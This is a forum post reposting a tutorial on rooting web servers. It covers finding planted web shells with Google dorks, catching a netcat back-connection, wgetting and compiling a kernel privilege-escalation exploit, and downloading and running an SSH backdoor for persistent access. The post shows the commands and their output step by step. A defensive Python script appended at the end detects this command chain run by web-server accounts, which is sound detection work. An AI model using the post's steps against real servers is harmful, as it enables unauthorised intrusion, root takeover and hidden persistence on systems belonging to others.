Rooting a Web Server with Netcat and a Shell
#1
Here's a simple tutorial I found on the internet, I didn't write it myself. I tried to correct most grammar errors, but let me know if I missed any. It relies on third party exploits and a shell, so don't expect much from it. But please reply/thank.

Things You Need:
# A Shell on a Website
# An Exploit
# Log cleaner
# SSH Backdoor
# Netcat

Use Google Dorks to find shells.
Once you find a shell, open a command prompt, go to the NetCat path, and type
"cd netcat.exe"

OK, open your shell in your browser and go to the back connection tab. If it is not there, get a shell like "WSO 2.3" or any other; that's your choice.

Specify your "ip & port as 2121". Press connect; now you'll get a shell to the server, and you can give commands to the server through that shell.

Now come back to netcat and type "nc -l -v -p 2121"

it will give you this output:
Code:
c:\netcat>nc -l -v -p 2121
listening on [any] 2121 ...


Getting the right exploit for the servers


Type : Uname -a & hit enter.
It'll look something like this:

Code:
[[email protected] /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux

You will have noted that it shows the kernel version of the server is: 2.6.18-194.26.1.el5, and the year is 2010.

You need to find a perfect exploit for it. You can find them at:
$ Exploit-db.com
$ Packetstormsecurity.org
$ Th3-0utl4ws.com
$ Leetupload.com


Compiling & executing exploits


Now I've got an exploit, and it is written in C, so I can't execute it by just uploading it; I need to compile it.

Before proceeding further, Cd into the tmp directory, because it is always writable. So type: Cd /home/XXXXX/public_html/tmp
// The path may be different, replace it with yours.

So first I'll get the exploit on the server, So I type : Wget http://exploitsite.net/2010-exploits/exploit.c
// Note: There is no such site, I'm just taking it to show you.
It'll look something Like this:-

Code:
[email protected] /home/target_usernemr/public_html/tmp]$ wget http://exploitsite.net/2010-exploits/exploit.c
--2011-01-25 08:21:43-- http://exploitsite.net/2010-exploits/exploit.c
Resolving http://www.exploitsite.net... 199.58.192.192
Connecting to http://www.exploitsite.net|199.58.192.192|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15088 (15K) [text/x-csrc]
Saving to: `exploit.c'


now change the permission of the exploit to 777.
Type: "Chmod 777 exploit.c"

Now the exploit is on my server, I just need to compile & execute it.
So, I'll give the command: "gcc -o exploit exploit.c"
It'll compile & save the exploit as >> exploit

Next step is to execute it So we'll type: "./exploit"


here it'll show different process...
: #
: #
got root you m0f0 !! [<example]


Now it says got root. Let's check whether it is true.
Type: "whoami"

then it will say "root"

like: uid=0(root) gid=0(root) groups=0(root)

Type "su" to get full privileges!


Installing Backdoors
type: "Wget http://www.urlofbackdoor.com/sshdoor.zip"


Then type,
Code:
unzip Sshdoor.zip
cd sshdoor
./run [i]<ENTER PASSWORD HERE> <ENTER PORT HERE>[/i]


Now connect with PuTTy and enjoy root privileges.


Methods to execute exploits written in other languages:
C exploit
----------------------
gcc -o exploit exploit.c
chmod +x exploit
./exploit
----------------------

Perl Exploits
---------------
perl exploit.pl
---------------

Python
------------------
python exploit.py
------------------

PHP
-----------------
php exploit.php
-----------------
Reply
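Seen from the defending side, the sequence in the post above (commands issued as the web server account: uname or whoami, a source file fetched with wget into a web-writable directory, chmod 777, gcc, then a local binary run) is a detectable chain. The following is an added example, not part of the original post; the event format, account names and threshold are assumptions, and the sample events are constructed.

```python
import re

# Accounts the web server / PHP handler runs as (assumption; set per host).
WEB_USERS = {"apache", "www-data", "nginx", "nobody"}
SCRIPT_EXT = re.compile(r"\.(c|pl|py|php|zip)$")

# One predicate per step of the sequence the post describes.
STAGES = [
    ("recon", lambda a: a[0] in {"uname", "whoami", "id"}),
    ("download", lambda a: a[0] in {"wget", "curl"} and any(SCRIPT_EXT.search(x) for x in a[1:])),
    ("chmod", lambda a: a[0] == "chmod" and any(x in {"777", "+x"} for x in a[1:])),
    ("compile", lambda a: a[0] in {"gcc", "cc"}),
    ("run_local", lambda a: a[0].startswith("./")),
]
# Hypothetical, simplified event format: "<ts> user=<u> cwd=<dir> cmd=<command line>"
LINE = re.compile(r"^\S+ user=(?P<user>\S+) cwd=\S+ cmd=(?P<cmd>.+)$")

def classify(argv):
    """Map one command line to a stage name, or None if it matches no stage."""
    return next((name for name, pred in STAGES if pred(argv)), None)

def detect(lines, threshold=3):
    """Return {user: [stages in first-seen order]} for web accounts reaching the threshold."""
    seen = {}
    for line in lines:
        m = LINE.match(line.strip())
        if not m or m["user"] not in WEB_USERS:
            continue
        argv = m["cmd"].split()
        if not argv[0].startswith("./"):
            argv[0] = argv[0].rsplit("/", 1)[-1]  # /usr/bin/wget -> wget
        stage = classify(argv)
        if stage and stage not in seen.setdefault(m["user"], []):
            seen[m["user"]].append(stage)
    return {u: s for u, s in seen.items() if len(s) >= threshold}

# Constructed sample events, not taken from any real host.
SAMPLE = [
    "2024-01-01T10:00:01 user=apache cwd=/home/site/public_html/cgi-bin cmd=uname -a",
    "2024-01-01T10:01:10 user=apache cwd=/home/site/public_html/tmp cmd=/usr/bin/wget http://example.invalid/file.c",
    "2024-01-01T10:01:30 user=apache cwd=/home/site/public_html/tmp cmd=chmod 777 file.c",
    "2024-01-01T10:01:45 user=apache cwd=/home/site/public_html/tmp cmd=gcc -o file file.c",
    "2024-01-01T10:02:00 user=apache cwd=/home/site/public_html/tmp cmd=./file",
    "2024-01-01T10:02:05 user=apache cwd=/home/site/public_html/tmp cmd=whoami",
    "2024-01-01T10:03:00 user=apache cwd=/var/www/uploads cmd=/usr/bin/convert in.png out.png",
    "2024-01-01T10:04:00 user=deploy cwd=/home/deploy/build cmd=gcc -o app app.c",
    "2024-01-01T10:05:00 user=www-data cwd=/var/www cmd=id",
]

if __name__ == "__main__":
    for user, stages in detect(SAMPLE).items():
        print(f"ALERT web account {user!r}: {' -> '.join(stages)}")
```

On a production host the web account has no reason to invoke a compiler at all, so the compile stage alone is worth alerting on, and removing compilers or mounting web-writable directories noexec breaks the chain at that point.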

